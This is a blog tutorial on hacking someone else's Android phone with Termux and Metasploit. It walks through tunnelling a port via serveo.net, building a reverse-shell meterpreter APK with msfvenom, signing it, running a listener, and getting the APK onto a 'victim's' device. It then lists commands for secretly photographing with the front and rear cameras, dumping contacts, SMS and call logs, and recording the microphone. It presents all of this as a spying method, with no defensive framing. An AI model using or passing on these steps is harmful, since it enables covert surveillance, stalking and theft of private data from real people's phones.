Hacking Android Device by TermuX in Mobile (Root / Non-Root)[ Level-Intermediate ]





Level - Intermediate

Requirements


1). Android 5.0 (Tutorial for Androids Lower Than 5.0 is HERE)

2). TermuX Android App (Download it from Play Store

3). Installed Metasploit Framework in TermuX (Tutorial Here)

4). Active Internet/WiFi Connection

5). TermuX should be allowed to use External Storage (For this only enter this command only at once: "termux-setup-storage")

6). MiXplorer (For signing APK file, Download it from UpToDown Website)

7). MiX Signer (APK Signer for MiXplorer, Download it from Play Store)

8). (Recommended) Use Hacker`s Keyboard for entering commands in TermuX easily.

Step 1


Port Forwarding

>pkg install openssh— It will successfully install OpenSSH

>ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net




(Optional) Name this session: Port Forwarding

Step 2


Creating APK File with Embedded Payload

>msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/your.apk




•Wait For a Minute





Step 3


Signing Newly Generated APK File




  • Long Press on "Un-Signed APK File (your.apk)" and select "MENU button" on top right corner of MiXplorer, then select "SIGN".





Step 4: Setup Metasploit in TermuX


•Activate Metasploit Framework in TermuX by entering this command in new session:

>msfconsole

— Metasploit Framework Console

>mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start




•Wait For A Minute to Start MSFCONSOLE




msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z

->enter only bold commands





Step 5: Installing APK in Victim's Android Device


>sessions -i (Session ID)








BINGO.......!!!!!!!! You have successfully hacked your Victim`s Android Device

!!!...Need Some Help While Hacking...???

!!!...Need Some Help While Hacking...???


You can enter: {meterpreter> help} command, for all the available commands, here, I`ve simplified some commands for you.

  • Taking Stealth Snapshot from Front Camera

Just enter this command for this:

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

Here, in this command, 2 is representing the front camera. For Back camera, you have to use 1.

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-F.jpg

  • Taking Stealth Snapshot from Rear Camera

Just as the above, but this time, we will use 1,

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-R.jpg

  • Fetching All Contacts

To fetch contacts, just enter this command:

dump_contacts -o storage/downloads/X-Contacts.txt

Conacts will be saved in : (Default Write Storage) -> downloads -> X-Contacts.txt

  • Fetching All SMS

Just like above,

dump_sms -o storage/downloads/X-SMS.txt

All the SMS will be saved in : (Default Write Storage) -> downloads -> X-SMS.txt

  • Fetching Call Log

Just enter this:

dump_calllog -o storage/downloads/X-CallLog.txt

Call Log will be saved in : (Default Write Storage) -> downloads -> X-CallLog.txt

  • Spying Through Microphone

Here, you have to edit the duration of the recording microphone (default: 1s). Command for 10 seconds recording is this:

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3

Spy Recording will be saved in : (Default Write Storage) -> downloads -> X-Spy-Record.mp3

???...Common Problems...???


  • Metasploit not running on TermuX

This might happen, if you do anything wrong in installing TermuX on android. If you see error like GEMS not found, or any this kind of error, simply Delete TermuX with its data, and reinstall it.

  • msfvenom/msfconsole : command not found!

There are two possible reasons for that error.

1). Metasploit is not properly installed on TermuX. That`s why, it was unable to create Command Shortcut. To fix this, uninstall the TermuX, with Data. Then reinstall TermuX and repeat all the Method again. This is actually a script error. I also faced this problem on first time installing Metasploit in TermuX!

2). Metasploit is successfully installed, but was unable to create the shortcut. To manage this, just enter:

  • Manual Way

Just open a New Session and go to metasploit-framework directory, and enter ./msfconsole command, Like This (same for msfvenom):

>cd metasploit-framework
>./msfconsole

OR


>./msfvenom


By Techy....


Post a Comment

Previous Post Next Post